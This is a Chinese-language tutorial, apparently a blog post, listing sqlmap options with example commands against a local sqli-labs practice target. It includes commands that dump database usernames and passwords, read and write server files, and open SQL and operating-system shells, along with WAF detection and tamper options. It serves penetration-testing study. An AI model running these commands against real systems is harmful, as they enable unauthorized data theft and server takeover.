床頭的插座連著充電器,充電器連著手機,手機連著耳機,耳機連著我,這樣的我,好像一個輸液的病人。。。
---- 網易雲熱評
一、環境:kali 2020.01,python2或python3
二、命令介紹
1、sqlmap --update 更新命令
2、is-dba 查詢是否是管理員權限
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --is-dba
3、dbs 獲取所有數據庫名稱
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --dbs
4、current-db 獲取當前數據庫名稱
5、users 獲取所有數據庫用戶
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --users
6、current-users 獲取當前數據庫用戶
7、tables 獲取所有表的信息
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --tables -D security
8、columns 獲取所有列的信息
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --columns -T users -D security
9、dump 獲取字段內容
10、--level 指定掃描等級
11、D 指定數據庫
12、T 指定表
13、C 指定列
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --dump -C "username,password" -T users -D security
14、dbms=mysql 指定數據庫
15、v 顯示調試信息
16、risk 顯示風險等級
17、u 獲取目標
18、m c:\\1.txt 從文件總獲取多個目標探測
19、data="id=1" post方式注入
20、data="su=123$id=456" --param0del="$" 分割參數
21、cookie cookie注入
22、referer 偽造http請求中的referer
23、headers 偽造http請求中的頭部
24、proxy 添加代理,http://url:port
25、delay 設置兩個請求間的延遲
26、timeout 設定請求超時時間
27、retries 設定重現鏈接次數
28、safe-url 提供一個連接,每隔一段時間就會去訪問一下
29、safe-freq 提供一個連接,每次請求之後都會去訪問一下
30、p "io=123" 指定參數進行探測注入
31、prefix 閉合語句的前面
32、suffix 閉合語句的後面
33、technique 指定探測方式
34、B:布爾型注入,E:報錯型注入,U:聯合查詢注入,S:多語句查詢注入,T:時間延遲注入
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --technique=U
35、union-cols 指定聯合查詢的字段數
36、union-char 指定聯合查詢用到的字符
37、second-order 二階注入後面跟跳轉網址
38、search用來尋找特定的數據庫名、表名、列名
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --search -T users
39、t "c:\\1.txt" 把請求與相應的日誌保存起來
40、batch 全自動按默認操作
41、charset=GBk 指定字符編碼
42、flush-session 清空之前的session重新測試
43、hex 使用hex函數避免編碼問題
44、smart 快速注入
45、mobile 設置成手機UA
45、identify-waf 監測用的什麼waf
46、check-waf 監測是否存在waf
47、common-tables -D text 暴力破解表名(access)
48、common-columns -D text -T ttt 暴力破解列名
49、tamper base64encode.py base64編碼注入
50、sql-query="select version()" 執行sql語句
51、sql-shell 直接獲取sql語句執行權限
sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --sql-shell
52、file-read 讀取文件
53、file-write 本地路勁 file-dest 上傳文件
54、os-shell 獲取shell權限
55、schema --exclude-sysdbs 列出除系統以外的數據庫
禁止非法,後果自負
閱讀更多 web安全工具庫 的文章